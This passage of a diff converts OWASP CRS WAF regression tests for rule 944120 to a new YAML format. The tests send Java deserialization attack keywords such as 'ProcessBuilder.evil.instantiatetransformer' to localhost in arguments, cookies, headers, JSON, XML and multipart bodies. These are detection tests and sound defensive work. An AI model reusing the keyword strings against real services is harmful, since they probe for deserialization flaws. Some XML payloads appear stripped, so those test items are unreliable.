log_contains: "id \"944120\"" - - test_title: 944120-43 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 43 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-44 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 44 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-45 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 45 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatefactory" - output: - log_contains: "id \"944120\"" - - test_title: 944120-46 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatefactory" + output: + log: + expect_ids: [944120] + - test_id: 46 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-47 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatefactory\"}" + output: + log: + expect_ids: [944120] + - test_id: 47 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-48 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-49 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-50 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-51 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-52 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-66 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-67 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: 